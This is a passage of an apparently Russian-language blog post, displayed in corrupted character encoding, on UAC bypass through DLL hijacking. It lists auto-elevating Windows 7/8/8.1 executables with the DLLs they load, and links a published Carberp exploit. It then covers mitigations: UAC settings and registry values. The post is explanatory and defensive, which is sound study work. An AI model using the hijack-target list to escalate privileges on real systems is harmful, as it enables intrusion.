<p>–ü—Ä–∏ —ç–∫—Å–ø–ª—É–∞—Ç–∞—Ü–∏–∏ —É—è–∑–≤–∏–º–æ—Å—Ç–∏ –ø–µ—Ä–µ—Ö–≤–∞—Ç–∞ DLL, –∏—Å–ø–æ–ª–Ω—è–µ–º—ã–π —Ñ–∞–π–ª –∫–æ—Ç–æ—Ä—ã–π –º—ã —Å–æ–±–∏—Ä–∞–µ–º—Å—è –∑–∞–ø—É—Å—Ç–∏—Ç—å —Å–Ω–æ–≤–∞ –¥–æ–ª–∂–µ–Ω –±—ã—Ç—å –ø–æ–¥–ø–∏—Å–∞–Ω; –Ω–∞—Ö–æ–¥–∏—Ç—Å—è –≤ –±–µ–∑–æ–ø–∞—Å–Ω–æ–º –∫–∞—Ç–∞–ª–æ–≥–µ; –∏ –¥–æ–ª–∂–µ–Ω —É–∫–∞–∑—ã–≤–∞—Ç—å —Å–≤–æ–π—Å—Ç–≤–æ autoElevate –≤ —Å–≤–æ–µ–º –º–∞–Ω–∏—Ñ–µ—Å—Ç–µ –¥–ª—è –∑–∞–≥—Ä—É–∑–∫–∏ –≤ –∫–∞—á–µ—Å—Ç–≤–µ –ø—Ä–æ—Ü–µ—Å—Å–∞ —Å –≤—ã—Å–æ–∫–æ–π —Å—Ç–µ–ø–µ–Ω—å—é —Ü–µ–ª–æ—Å—Ç–Ω–æ—Å—Ç–∏.</p>

<p>–í Windows 7 –µ—Å—Ç—å —Ç—Ä–∏ –∏—Å–ø–æ–ª–Ω—è–µ–º—ã—Ö —Ñ–∞–π–ª–∞ –∫–æ—Ç–æ—Ä—ã–µ –º–æ–∂–Ω–æ —ç–∫—Å–ø–ª—É–∞—Ç–∏—Ä–æ–≤–∞—Ç—å –∏ —Å–≤—è–∑–∞–Ω–Ω—ã–µ —Å –Ω–∏–º–∏ –±–∏–±–ª–∏–æ—Ç–µ–∫–∏ DLL –ø–µ—Ä–µ—á–∏—Å–ª–µ–Ω–Ω—ã –Ω–∏–∂–µ:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\windows\ehome\Mcx2Prov.exe
C:\Windows\ehome\CRYPTBASE.dll

C:\windows\System32\sysprep\sysprep.exe
C:\Windows\System32\sysprep\CRYPTSP.dll
C:\windows\System32\sysprep\CRYPTBASE.dll
C:\Windows\System32\sysprep\RpcRtRemote.dll
C:\Windows\System32\sysprep\UxTheme.dll

C:\windows\System32\cliconfg.exe
C:\Windows\System32\NTWDBLIB.DLL
</code></pre></div></div>

<p>–ù–∞ malwr.com –≤—Ä–µ–¥–æ–Ω–æ—Å–Ω–∞—è –ø—Ä–æ–≥—Ä–∞–º–º–∞ –≤—ã–ª–æ–∂–µ–Ω–Ω–∞—è 25 –ò—é–Ω—è –ø—Ä–æ—à–ª–æ–≥–æ –≥–æ–¥–∞, —É–∂–µ –∏—Å–ø–æ–ª—å–∑–æ–≤–∞–ª–∞ Mcx2Prov.exe –¥–ª—è –æ–±—Ö–æ–¥–∞ UAC, –∞ –¥–Ω–µ–º –ø–æ–∑–∂–µ —ç–∫—Å–ø–ª–æ–π—Ç –±—ã–ª <a href="https://github.com/hzeroo/Carberp/blob/master/source%20-%20absource/pro/all%20source/BJWJ/source/exploit/UAC_bypass.cpp">–æ–ø—É–±–ª–∏–∫–æ–≤–∞–Ω</a>.</p>

<p><img src="/assets/img/posts/bypass uac/malwruac.png" alt="1" class="imghalf" /></p>

<p>–¢–æ—Ç –∂–µ —Ö—ç—à –±—ã–ª —Ç–∞–∫–∂–µ –æ—Ç–º–µ—á–µ–Ω –Ω–∞ VirusTotal (38/54), –±—ã–ª –ø—Ä–µ–¥—Å—Ç–∞–≤–ª–µ–Ω –±–æ–ª–µ–µ —á–µ—Ç—ã—Ä–µ—Ö –º–µ—Å—è—Ü–µ–≤ –Ω–∞–∑–∞–¥.</p>

<p>–í Windows 8 —Ç–∞–∫–∂–µ –µ—Å—Ç—å —Ç—Ä–∏ –∏—Å–ø–æ–ª–Ω—è–µ–º—ã—Ö —Ñ–∞–π–ª–∞ –∫–æ—Ç–æ—Ä—ã–µ –º–æ–∂–Ω–æ —ç–∫—Å–ø–ª—É–∞—Ç–∏—Ä–æ–≤–∞—Ç—å –∏ —Å–≤—è–∑–∞–Ω–Ω—ã–µ —Å –Ω–∏–º–∏ –±–∏–±–ª–∏–æ—Ç–µ–∫–∏ DLL –ø–µ—Ä–µ—á–∏—Å–ª–µ–Ω—ã –Ω–∏–∂–µ:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\windows\System32\sysprep\sysprep.exe
C:\windows\System32\sysprep\CRYPTBASE.dll
C:\Windows\System32\Sysprep\dwmapi.dll
C:\Windows\System32\Sysprep\SHCORE.dll

C:\windows\System32\cliconfg.exe
C:\Windows\System32\NTWDBLIB.DLL

C:\windows\System32\pwcreator.exe
C:\Windows\System32\vds.exe
C:\Windows\System32\UReFS.DLL
</code></pre></div></div>

<p>–ù–∞–∫–æ–Ω–µ—Ü, –≤ Windows 8.1 –µ—Å—Ç—å —Ç–∞–∫–∂–µ —Ç—Ä–∏ –∏—Å–ø–æ–ª–Ω—è–µ–º—ã—Ö —Ñ–∞–π–ª–∞ –∫–æ—Ç–æ—Ä—ã–µ –º–æ–∂–Ω–æ —ç–∫—Å–ø–ª—É–∞—Ç–∏—Ä–æ–≤–∞—Ç—å –∏ —Å–≤—è–∑–∞–Ω–Ω—ã–µ —Å –Ω–∏–º–∏ –±–∏–±–ª–∏–æ—Ç–µ–∫–∏ DLL –ø–µ—Ä–µ—á–∏—Å–ª–µ–Ω–Ω—ã –Ω–∏–∂–µ:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\windows\System32\sysprep\sysprep.exe
C:\Windows\System32\Sysprep\SHCORE.dll
C:\Windows\System32\Sysprep\OLEACC.DLL

C:\windows\System32\cliconfg.exe
C:\Windows\System32\NTWDBLIB.DLL

C:\windows\System32\pwcreator.exe
C:\Windows\System32\vds.exe
C:\Program Files\Common Files\microsoft shared\ink\CRYPTBASE.dll
C:\Program Files\Common Files\microsoft shared\ink\CRYPTSP.dll
C:\Program Files\Common Files\microsoft shared\ink\dwmapi.dll
C:\Program Files\Common Files\microsoft shared\ink\USERENV.dll
C:\Program Files\Common Files\microsoft shared\ink\OLEACC.dll
</code></pre></div></div>

<p>–í—ã–∑–æ–≤ –∏—Å–ø–æ–ª–Ω—è–µ–º–æ–≥–æ —Ñ–∞–π–ª–∞ pwcreator.exe (—Å–æ–∑–¥–∞–Ω–∏–µ —Ä–∞–±–æ—á–µ–π –æ–±–ª–∞—Å—Ç–∏ Windows To Go) –≤—ã–∑—ã–≤–∞–µ—Ç vds.exe (—Å–ª—É–∂–±–∞ –≤–∏—Ä—Ç—É–∞–ª—å–Ω—ã—Ö –¥–∏—Å–∫–æ–≤), –∫–æ—Ç–æ—Ä–∞—è –∑–∞—Ç–µ–º –∑–∞–≥—Ä—É–∂–∞–µ—Ç –Ω–∞—à—É DLL –∏ –¥–∞—ë—Ç –Ω–∞–º —Ü–µ–ª–æ—Å—Ç–Ω–æ—Å—Ç—å —Å–∏—Å—Ç–µ–º—ã —Ä–∞–±–æ—Ç–∞–µ—Ç –∏–∑ –ø–æ–¥ SYSTEM –∞–∫–∫–∞—É–Ω—Ç–∞.</p>

<p><img src="/assets/img/posts/bypass uac/proexpvds.png" alt="1" class="imghalf" /></p>

<p>–í—ã–∑–æ–≤ —ç—Ç–∏—Ö –∏—Å–ø–æ–ª–Ω—è–µ–º—ã—Ö —Ñ–∞–π–ª–æ–≤ sysprep.exe, cliconfg.exe –∏ pwcreater.exe –ø—Ä–∏–≤–æ–¥–∏—Ç –∫ –ø–æ—è–≤–ª–µ–Ω–∏—é –æ–∫–Ω–∞ —Å –≥—Ä–∞—Ñ–∏—á–µ—Å–∫–∏–º –∏–Ω—Ç–µ—Ä—Ñ–µ–π—Å–æ–º, –Ω–æ —Ç–∞–∫ –∂–µ –¥–æ–ª–∂–µ–Ω –ª–µ–≥–∫–æ –∑–∞–ø—É—Å—Ç–∏—Ç—å—Å—è –≤ —Ñ–æ–Ω–æ–≤–æ–º —Ä–µ–∂–∏–º–µ, –∞ –∑–∞—Ç–µ–º –∑–∞–≤–µ—Ä—à–∏—Ç—å—Å—è –ø–æ—Å–ª–µ —ç–∫—Å–ø–ª—É–∞—Ç–∞—Ü–∏–∏. –≠—Ç–æ —Ç–æ —á—Ç–æ —è –Ω–µ –∏–∑—É—á–∞–ª —Å–ª–∏—à–∫–æ–º –≥–ª—É–±–æ–∫–æ, –ø–æ—ç—Ç–æ–º—É —Ç—É—Ç —è –≤–∞—Å –æ—Å—Ç–∞–≤–ª—é –≤ –Ω–µ–≤–µ–¥–µ–Ω–∏–∏.</p>

<p><img src="/assets/img/posts/bypass uac/sysprep.png" alt="1" class="imghalf" />
<img src="/assets/img/posts/bypass uac/cliconfg.png" alt="1" class="imghalf" />
<img src="/assets/img/posts/bypass uac/pwcreator.png" alt="1" class="imghalf" /></p>

<h1 id="—Å–º—è–≥—á–µ–Ω–∏–µ">–°–º—è–≥—á–µ–Ω–∏–µ</h1>
<p>–õ—É—á—à–∏–π —Å–ø–æ—Å–æ–± —Å–º—è–≥—á–∏—Ç—å —ç—Ç–æ—Ç –æ–±—Ö–æ–¥ - –ø—Ä–æ—Å—Ç–æ –Ω–µ –ø—Ä–µ–¥–æ—Å—Ç–∞–≤–ª—è—Ç—å –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª—è–º –ø—Ä–∞–≤–∞ –ª–æ–∫–∞–ª—å–Ω–æ–≥–æ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞ –¥–ª—è —Å–≤–æ–∏—Ö –∫–æ–º–ø—å—é—Ç–µ—Ä–æ–≤. –ë–æ–ª—å—à–∏–Ω—Å—Ç–≤–æ —É—á–µ—Ç–Ω—ã—Ö –∑–∞–ø–∏—Å–µ–π –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª–µ–π –≤ –∫–æ—Ä–ø–æ—Ä–∞—Ç–∏–≤–Ω–æ–π —Å—Ä–µ–¥–µ –∏ –≤—ã –¥–æ–ª–∂–Ω—ã –±—ã—Ç—å –≤ —Å–æ—Å—Ç–æ—è–Ω–∏–∏ —Å–¥–µ–ª–∞—Ç—å —ç—Ç–æ, —É–º–µ–Ω—å—à–∞—è –ø–æ–≤–µ—Ä—Ö–Ω–æ—Å—Ç—å –∞—Ç–∞–∫–∏. –≠—Ç–æ, –æ–¥–Ω–∞–∫–æ, –Ω–µ —Ä–∞—Å–ø—Ä–æ—Å—Ç—Ä–∞–Ω—è–µ—Ç—Å—è –Ω–∞ –¥–æ–º–∞—à–Ω–∏—Ö –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª–µ–π, –∫–æ—Ç–æ—Ä—ã–µ –ø–æ —É–º–æ–ª—á–∞–Ω–∏—é –∏–º–µ—é—Ç –ø—Ä–∞–≤–∞ –ª–æ–∫–∞–ª—å–Ω–æ–≥–æ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞.</p>

<p>–§–∞–∫—Ç–∏—á–µ—Å–∫–∏, –æ–±—Ö–æ–¥ —Ä–∞–±–æ—Ç–∞–µ—Ç —Ç–æ–ª—å–∫–æ –ø—Ä–∏ –¥–≤—É—Ö —Å—Ä–µ–¥–Ω–∏—Ö –≤—ã—Å—Ç–∞–≤–ª–µ–Ω–Ω—ã—Ö –Ω–∞—Å—Ç—Ä–æ–π–∫–∞—Ö UAC, –∫–æ—Ç–æ—Ä—ã–µ –ø–æ–∑–≤–æ–ª—è—é—Ç –∞–≤—Ç–æ–º–∞—Ç–∏—á–µ—Å–∫–∏ –ø–æ–¥–Ω–∏–º–∞—Ç—å—Å—è. –ß—Ç–æ–±—ã —É–≤–∏–¥–µ—Ç—å –Ω–∞—Å—Ç—Ä–æ–π–∫–∏ –≤–∞–º –Ω—É–∂–Ω–æ –ø–µ—Ä–µ–π—Ç–∏ –≤ –ü–∞–Ω–µ–ª—å —É–ø—Ä–∞–≤–ª–µ–Ω–∏—è - –£—á–µ—Ç–Ω—ã–µ –∑–∞–ø–∏—Å–∏ –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª–µ–π - –ò–∑–º–µ–Ω–∏—Ç—å –Ω–∞—Å—Ç—Ä–æ–π–∫–∏ –∫–æ–Ω—Ç—Ä–æ–ª—è —É—á–µ—Ç–Ω—ã—Ö –∑–∞–ø–∏—Å–µ–π.</p>

<blockquote>
  <p>–£–≤–µ–¥–æ–º–ª—è—Ç—å –º–µ–Ω—è —Ç–æ–ª—å–∫–æ –∫–æ–≥–¥–∞ –ø—Ä–∏–ª–æ–∂–µ–Ω–∏—è –ø—ã—Ç–∞—é—Ç—Å—è –≤–Ω–µ—Å—Ç–∏ –∏–∑–º–µ–Ω–µ–Ω–∏—è –≤ –º–æ–π –∫–æ–º–ø—å—é—Ç–µ—Ä (–ø–æ —É–º–æ–ª—á–∞–Ω–∏—é)</p>
</blockquote>

<p><img src="/assets/img/posts/bypass uac/uacsettings.png" alt="1" class="imghalf" /></p>

<p>–¢–∞–∫–∏–º –æ–±—Ä–∞–∑–æ–º, –º—ã –º–æ–≥–ª–∏ –±—ã —É—Å—Ç–∞–Ω–æ–≤–∏—Ç—å ‚Äú–í—Å–µ–≥–¥–∞ —É–≤–µ–¥–æ–º–ª—è—Ç—å‚Äù, –Ω–æ —ç—Ç–æ –≤–µ—Ä–Ω—É–ª–æ –±—ã –µ–≥–æ –∫ —Ç–æ–º—É, –∫–∞–∫ —ç—Ç–æ –±—ã–ª–æ –≤ Windows Vista —Å –ø–æ—Å—Ç–æ—è–Ω–Ω—ã–º–∏ —É–≤–µ–¥–æ–º–ª–µ–Ω–∏—è–º–∏ –∏ –Ω–µ –æ—á–µ–Ω—å –ø—Ä–∞–∫—Ç–∏—á–Ω–æ, —Ç–∞–∫ –∂–µ –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª—å –≤ –∫–æ–Ω–µ—á–Ω–æ–º –∏—Ç–æ–≥–µ —É—Å—Ç–∞–Ω–æ–≤–∏—Ç –µ–≥–æ –Ω–∞ ‚Äú–ù–∏–∫–æ–≥–¥–∞ –Ω–µ —É–≤–µ–¥–æ–º–ª—è—Ç—å‚Äù, —á—Ç–æ –æ–ø—Ä–µ–¥–µ–ª–µ–Ω–Ω–æ –Ω–µ —è–≤–ª—è–µ—Ç—Å—è —Ö–æ—Ä–æ—à–µ–π –∏–¥–µ–µ–π.</p>

<p>Microsoft –ø—Ä–µ–¥–æ—Å—Ç–∞–≤–∏–ª–∞ –Ω–∞–º 10 –ø–æ–ª–∏—Ç–∏–∫ UAC —Å –∫–æ—Ç–æ—Ä—ã–º–∏ —Å—Ç–æ–∏—Ç –ø–æ–∏–≥—Ä–∞—Ç—å, –ø–æ—ç—Ç–æ–º—É —Å—Ç–æ–∏—Ç –ø–æ—Ç—Ä–∞—Ç–∏—Ç—å –Ω–µ–∫–æ—Ç–æ—Ä–æ–µ –≤—Ä–µ–º—è –Ω–∞ –∏—Ö –ø–æ–Ω–∏–º–∞–Ω–∏–µ –∏ —Ç–µ—Å—Ç–∏—Ä–æ–≤–∞–Ω–∏–µ –ø—Ä–µ–∂–¥–µ —á–µ–º –≤–Ω–µ–¥—Ä—è—Ç—å –∏—Ö –≤ —Å—Ä–µ–¥–µ —Å–≤–æ–µ–≥–æ –¥–æ–º–µ–Ω–∞. –ß—Ç–æ–±—ã —É–≤–∏–¥–µ—Ç—å, —á—Ç–æ –ø—Ä–∏–º–µ–Ω–µ–Ω–æ –Ω–∞ –≤–∞—à–µ–º –ª–æ–∫–∞–ª—å–Ω–æ–º –∫–æ–º–ø—å—é—Ç–µ—Ä–µ, –≤–≤–µ–¥–∏—Ç–µ secpol.msc –≤ Start-Run, —á—Ç–æ–±—ã –æ—Ç–∫—Ä—ã—Ç—å  –æ–∫–Ω–æ ¬´–õ–æ–∫–∞–ª—å–Ω–∞—è –ø–æ–ª–∏—Ç–∏–∫–∞ –±–µ–∑–æ–ø–∞—Å–Ω–æ—Å—Ç–∏¬ª –∏ —Ä–∞–∑–≤–µ—Ä–Ω—É—Ç—å –ø–∞–ø–∫—É ¬´–ü–∞—Ä–∞–º–µ—Ç—Ä—ã –ª–æ–∫–∞–ª—å–Ω–æ–π –ø–æ–ª–∏—Ç–∏–∫–∏ –±–µ–∑–æ–ø–∞—Å–Ω–æ—Å—Ç–∏¬ª. –ó–∞–ø—É—Å—Ç–∏—Ç–µ rsop.msc –¥–ª—è –ø—Ä–æ—Å–º–æ—Ç—Ä–∞ –≥—Ä—É–ø–ø–æ–≤—ã—Ö –ø–æ–ª–∏—Ç–∏–∫, –ø—Ä–∏–º–µ–Ω—è–µ–º—ã—Ö –Ω–∞ –∫–æ–º–ø—å—é—Ç–µ—Ä–∞—Ö –≤ –¥–æ–º–µ–Ω–Ω–æ–π —Å—Ä–µ–¥–µ.</p>

<p><img src="/assets/img/posts/bypass uac/secpol.png" alt="1" class="imghalf" /></p>

<p>–í–æ—Ç —Ç–∞–∫ –≤—ã–≥–ª—è–¥—è—Ç –≤ —Ä–µ–µ—Å—Ç—Ä–µ –∑–Ω–∞—á–µ–Ω–∏—è UAC –ø–æ —É–º–æ–ª—á–∞–Ω–∏—é</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:00000005
"ConsentPromptBehaviorUser"=dword:00000003
"EnableInstallerDetection"=dword:00000001
"EnableLUA"=dword:00000001
"EnableSecureUIAPaths"=dword:00000001
"EnableUIADesktopToggle"=dword:00000000
"EnableVirtualization"=dword:00000001
"FilterAdministratorToken"=dword:00000000
"PromptOnSecureDesktop"=dword:00000001
"ValidateAdminCodeSignatures"=dword:00000000
</code></pre></div></div>

<p>–ö–æ–≥–¥–∞ –ø–æ–ª–∑—É–Ω–æ–∫ –ø–µ—Ä–µ–º–µ—â–∞–µ—Ç—Å—è –≤–≤–µ—Ä—Ö –¥–æ ¬´–í—Å–µ–≥–¥–∞ —É–≤–µ–¥–æ–º–ª—è—Ç—å –º–µ–Ω—è¬ª, –æ–Ω –º–µ–Ω—è–µ—Ç —ç—Ç–æ –∑–Ω–∞—á–µ–Ω–∏–µ.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"ConsentPromptBehaviorAdmin"=dword:00000002
</code></pre></div></div>

<p>–ö–æ–≥–¥–∞ –ø–æ–ª–∑—É–Ω–æ–∫ –ø–µ—Ä–µ–º–µ—â–∞–µ—Ç—Å—è –≤–Ω–∏–∑ –¥–æ ¬´–£–≤–µ–¥–æ–º–ª—è—Ç—å –º–µ–Ω—è —Ç–æ–ª—å–∫–æ –∫–æ–≥–¥–∞ –ø—Ä–∏–ª–æ–∂–µ–Ω–∏—è –ø—ã—Ç–∞—é—Ç—Å—è –≤–Ω–µ—Å—Ç–∏ –∏–∑–º–µ–Ω–µ–Ω–∏—è –≤ –º–æ–π –∫–æ–º–ø—å—é—Ç–µ—Ä (–Ω–µ –∏–∑–º–µ–Ω—è—è –Ω–∞—Å—Ç—Ä–æ–π–∫–∏ —Ä–∞–±–æ—á–µ–≥–æ —Å—Ç–æ–ª–∞)¬ª, –æ–Ω –º–µ–Ω—è–µ—Ç —ç—Ç–æ –∑–Ω–∞—á–µ–Ω–∏–µ.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"PromptOnSecureDesktop"=dword:00000000
</code></pre></div></div>

<p>–ù—É –∏ –∫–æ–≥–¥–∞ –ø–æ–ª–∑—É–Ω–æ–∫ –ø–µ—Ä–µ–º–µ—â–∞–µ—Ç—Å—è –≤ ¬´–ù–∏–∫–æ–≥–¥–∞ –Ω–µ —É–≤–µ–¥–æ–º–ª—è—Ç—å¬ª, –∏–∑–º–µ–Ω–µ–Ω–Ω—ã–µ –∑–Ω–∞—á–µ–Ω–∏—è —ç—Ç–æ</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"ConsentPromptBehaviorAdmin"=dword:00000000
"EnableLUA"=dword:00000000
"PromptOnSecureDesktop"=dword:00000000
</code></pre></div></div>

<p>–û–±—Ä–∞—Ç–∏—Ç–µ –≤–Ω–∏–º–∞–Ω–∏–µ, —á—Ç–æ EnableLUA –ø–æ–ª–Ω–æ—Å—Ç—å—é –æ—Ç–∫–ª—é—á–µ–Ω. –≠—Ç–æ —á—Ä–µ–∑–≤—ã—á–∞–π–Ω–æ –æ–ø–∞—Å–Ω–æ–µ –∑–Ω–∞—á–µ–Ω–∏–µ, –∏ –µ–≥–æ –Ω–∏–∫–æ–≥–¥–∞ –Ω–µ —Å–ª–µ–¥—É–µ—Ç –æ—Ç–∫–ª—é—á–∞—Ç—å, –ø–æ—ç—Ç–æ–º—É –Ω–∞—Å—Ç–æ—è—Ç–µ–ª—å–Ω–æ —Ä–µ–∫–æ–º–µ–Ω–¥—É–µ—Ç—Å—è –≤–∫–ª—é—á–∏—Ç—å —ç—Ç–∏ –ø–∞—Ä–∞–º–µ—Ç—Ä—ã –≤ –≥—Ä—É–ø–ø–æ–≤—ã—Ö –ø–æ–ª–∏—Ç–∏–∫–∞—Ö —á—Ç–æ–±—ã –æ–Ω–∏ –≤—Å–µ–≥–¥–∞ –ø—Ä–∏–º–µ–Ω—è–ª–∏—Å—å, –µ—Å–ª–∏ –ø–∞—Ä–∞–º–µ—Ç—Ä—ã —Å–±—Ä–∞—Å—ã–≤–∞—é—Ç—Å—è/–∏–∑–º–µ–Ω—è—é—Ç—Å—è –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª—è–º–∏ –∏–ª–∏ —Ä–∞–Ω–µ–µ —É–¥–∞–ª–µ–Ω–Ω—ã–º–∏ –≤—Ä–µ–¥–æ–Ω–æ—Å–Ω—ã–º–∏ –ø—Ä–æ–≥—Ä–∞–º–º–∞–º–∏.</p>

<h1 id="–∫–æ–Ω—Ç—Ä–æ–ª—å-—É—á–µ—Ç–Ω—ã—Ö-–∑–∞–ø–∏—Å–µ–π-–∑–∞–ø—É—Å–∫-–≤—Å–µ—Ö-–∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–≤-–≤-—Ä–µ–∂–∏–º–µ-–æ–¥–æ–±—Ä–µ–Ω–∏—è-–∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–º">–ö–æ–Ω—Ç—Ä–æ–ª—å —É—á–µ—Ç–Ω—ã—Ö –∑–∞–ø–∏—Å–µ–π: –∑–∞–ø—É—Å–∫ –≤—Å–µ—Ö –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–≤ –≤ —Ä–µ–∂–∏–º–µ –æ–¥–æ–±—Ä–µ–Ω–∏—è –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–º.</h1>

<p>–ü–æ—Å–ª–µ –æ—Ç–∫–ª—é—á–µ–Ω–∏—è, –Ω–µ —Ç–æ–ª—å–∫–æ –≤—Ä–µ–¥–æ–Ω–æ—Å–Ω—ã–π –ø—Ä–æ—Ü–µ—Å—Å —Å–º–æ–∂–µ—Ç –ø–µ—Ä–µ—Ö–æ–¥–∏—Ç—å –ø—Ä—è–º–æ –≤ —Ä–µ–∂–∏–º –≤—ã—Å–æ–∫–æ–π —Ü–µ–ª–æ—Å—Ç–Ω–æ—Å—Ç–∏, –Ω–æ –∏ Internet Explorer –±—É–¥–µ—Ç —Ä–∞–±–æ—Ç–∞—Ç—å –≤ —Ä–µ–∂–∏–º–µ —Å—Ä–µ–¥–Ω–µ–π —Ü–µ–ª–æ—Å—Ç–Ω–æ—Å—Ç–∏. UAC –ø—Ä–µ–¥–æ—Å—Ç–∞–≤–ª—è–µ—Ç –Ω–∞–º –∑–∞—â–∏—â–µ–Ω–Ω—ã–π —Ä–µ–∂–∏–º (–ø–µ—Å–æ—á–Ω–∏—Ü—É) –≤ Internet Explorer, –æ–±–µ—Å–ø–µ—á–∏–≤–∞—è –¥–æ–ø–æ–ª–Ω–∏—Ç–µ–ª—å–Ω—É—é –±–µ–∑–æ–ø–∞—Å–Ω–æ—Å—Ç—å. –û–±—ã—á–Ω–æ Internet Explorer —Ä–∞–±–æ—Ç–∞–µ—Ç –≤ –ø—Ä–æ—Ü–µ—Å—Å–µ —Å –Ω–∏–∑–∫–∏–º —É—Ä–æ–≤–Ω–µ–º —Ü–µ–ª–æ—Å—Ç–Ω–æ—Å—Ç–∏, –ø–æ—ç—Ç–æ–º—É –µ—Å–ª–∏ –æ–Ω —Å–∫–æ–º–ø—Ä–æ–º–µ—Ç–∏—Ä–æ–≤–∞–Ω –∫–∞–∫–∏–º-–ª–∏–±–æ —ç–∫—Å–ø–ª–æ–π—Ç–æ–º IE —Ç–æ —É—â–µ—Ä–± —Å–≤–æ–¥–∏—Ç—Å—è –∫ –º–∏–Ω–∏–º—É–º—É, —Ç–∞–∫ –∫–∞–∫ –ø—Ä–∏ –Ω–∏–∑–∫–æ–π —Ü–µ–ª–æ—Å—Ç–Ω–æ—Å—Ç–∏ —Å—É—â–µ—Å—Ç–≤—É–µ—Ç —Ç–æ–ª—å–∫–æ –Ω–µ—Å–∫–æ–ª—å–∫–æ –º–µ—Å—Ç –≤ –∫–æ—Ç–æ—Ä—ã–µ –æ–Ω –º–æ–∂–µ—Ç –±—ã—Ç—å –∑–∞–ø–∏—Å–∞–Ω –≤ —Å–∏—Å—Ç–µ–º–µ.</p>

<p>–≠—Ç–∏ –∏–∑–º–µ–Ω–µ–Ω–∏—è, —É–ø–æ–º—è–Ω—É—Ç—ã–µ –≤—ã—à–µ, –±—ã–ª–∏ –∑–∞–º–µ—á–µ–Ω—ã –≤ Windows 7, –≤ Windows 8/8.1 EnableLUA –Ω–µ –∏–∑–º–µ–Ω—è–µ—Ç—Å—è –Ω–∞ –æ—Ç–∫–ª—é—á–µ–Ω–Ω—ã–π. –ü–æ—ç—Ç–æ–º—É, –∫–æ–≥–¥–∞ –ø–æ–ª–∑—É–Ω–æ–∫ –ø–µ—Ä–µ–º–µ—â–µ–Ω –≤ ¬´–ù–∏–∫–æ–≥–¥–∞ –Ω–µ —É–≤–µ–¥–æ–º–ª—è—Ç—å¬ª, –∏–∑–º–µ–Ω–µ–Ω–Ω—ã–µ –∑–Ω–∞—á–µ–Ω–∏—è –ø—Ä–∏–æ–±—Ä–µ—Ç–∞—é—Ç —Ç–æ–ª—å–∫–æ —Ç–∞–∫–æ–π –≤–∏–¥</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"ConsentPromptBehaviorAdmin"=dword:00000000
"PromptOnSecureDesktop"=dword:00000000
</code></pre></div></div>

<p>–ü–æ—Å–∫–æ–ª—å–∫—É –∑–Ω–∞—á–µ–Ω–∏–µ ‚ÄúEnableLUA‚Äù=dword:00000001 –Ω–µ –∏–∑–º–µ–Ω—è–µ—Ç—Å—è, UAC –Ω–µ –ø–æ–ª–Ω–æ—Å—Ç—å—é –æ—Ç–∫–ª—é—á–µ–Ω –∏ Internet Explorer –ø–æ-–ø—Ä–µ–∂–Ω–µ–º—É –±—É–¥–µ—Ç —Ä–∞–±–æ—Ç–∞—Ç—å —Å –Ω–∏–∑–∫–∏–º —É—Ä–æ–≤–Ω–µ–º —Ü–µ–ª–æ—Å—Ç–Ω–æ—Å—Ç–∏.</p>

<p><img src="/assets/img/posts/bypass uac/iew8low.png" alt="1" class="imghalf" /></p>

<p>–û–¥–Ω–∞–∫–æ, –µ—Å–ª–∏ –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª—å –≤–æ—à–µ–ª –≤ —Å–∏—Å—Ç–µ–º—É —Å —É—á–µ—Ç–Ω–æ–π –∑–∞–ø–∏—Å—å—é –ª–æ–∫–∞–ª—å–Ω–æ–≥–æ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞ (–∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–º, –∏–ª–∏ –ª—é–±—ã–º –¥—Ä—É–≥–∏–º –ø–µ—Ä–µ–∏–º–µ–Ω–æ–≤–∞–Ω–Ω—ã–º –≤ –≤–∞—à–µ–π –∫–æ—Ä–ø–æ—Ä–∞—Ç–∏–≤–Ω–æ–π —Å–±–æ—Ä–∫–µ –≤–ª–∞—Å—Ç–∏—Ç–µ–ª–µ–º), –Ω–∞—Å—Ç—Ä–æ–π–∫–∏ UAC –Ω–µ –ø—Ä–∏–º–µ–Ω—è—é—Ç—Å—è, –ø–æ—Å–∫–æ–ª—å–∫—É –≤—Å–µ –ø—Ä–æ—Ü–µ—Å—Å—ã —Ä–∞–±–æ—Ç–∞—é—Ç —Å –≤—ã—Å–æ–∫–æ–π —Å—Ç–µ–ø–µ–Ω—å—é —Ü–µ–ª–æ—Å—Ç–Ω–æ—Å—Ç–∏. –≠—Ç–æ –æ—Ç–Ω–æ—Å–∏—Ç—Å—è –∫ Windows 7/8 –∏ 8.1, –ø–æ—ç—Ç–æ–º—É –≤—Å–µ–≥–¥–∞ —Å–ª–µ–¥–∏—Ç–µ –∑–∞ —Ç–µ–º —á—Ç–æ–±—ã –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª–∏ –ù–ï –≤—Ö–æ–¥–∏–ª–∏ –≤ —Å–∏—Å—Ç–µ–º—É —Å 